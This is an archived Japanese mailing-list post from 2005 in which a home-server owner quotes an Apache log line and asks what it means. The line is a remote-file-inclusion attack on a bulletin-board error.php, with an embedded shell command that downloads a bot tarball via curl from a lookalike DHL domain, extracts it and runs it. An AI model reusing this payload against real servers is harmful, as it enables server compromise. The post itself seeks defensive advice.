[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[connect24h:9875] bot?

To: connect24h@xxxxxxxxxx
Subject: [connect24h:9875] bot?
From: Masaki Mizutani <m-saki@xxxxxxxxxxxxxx>
Date: Wed, 12 Oct 2005 12:03:39 +0900

みずたにです。

おうちのApacheのログに以下のような行がありました。

210.178.71.1 - - [12/Oct/2005:02:20:31 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://tracknr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http://tracknr-dhl-usa.com/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

http://tracknr-dhl-usa.com/ って http://www.dhl-usa.com/ と微妙に違うので
ニセサイトっぽい(inktomeだし)のですが、このアクセスは
何をしようとしているのでしょうか。
	1.おうちサーバそのものから「tar xzvf bot; cd bot...」しようとしている
	2.それとも、ログファイルを見て「なんだろう」と思って実行しちゃう
	  (いるのか?そんな奴)のを狙っている
	3.他の意図
「1.」だったとして、どういう点に注意すればよいのでしょうか。
error.php とかいうやつに欠陥があるのかな?

-- 
水谷　正樹 / m-saki@xxxxxxxxxxxxxx
PGP Fingerprint: E551 12B2 CF6B 50EA BD5C  CFD1 FF41 0F6E 595C 92CE
PGP Public Key : http://m-saki.dyndns.org/%7Emizutani/key/

--[PR]------------------------------------------------------------------
 ＿＿＿＿＿┏━━━━━━━━━━━━━━━━━━━━━━━━┓＿＿＿
 ☆…☆…☆┃　豪華賞品あれこれまとめてセットで当たります！　┃☆…☆
 ￣￣￣￣￣┗━━━━━━━━━━━━━━━━━━━━━━━━┛￣￣￣
　　　　　　　　懸賞ならココ！ふくびき.comであなたも運試し♪
　　　　　 http://www.fukubiki.com/vgu/Regist.do?aid=frml051001
------------------------------------------------------------------[PR]--
■GMO INTERNET GROUP■ GMO INTERNET www.gmo.jp

Follow-Ups:
- [connect24h:9877] Re: bot?
  - From: HAMAGUCHI Seiji
- [connect24h:9878] Re: bot?
  - From: DANNA

Prev by Date: [connect24h:9874] Re: 不用意な暗号化を解くには
Next by Date: [connect24h:9876] [情報提供]暗号化ツール
Previous by thread: [connect24h:9866] Re: FD への思い入れ
Next by thread: [connect24h:9877] Re: bot?
Index(es):
- Date
- Thread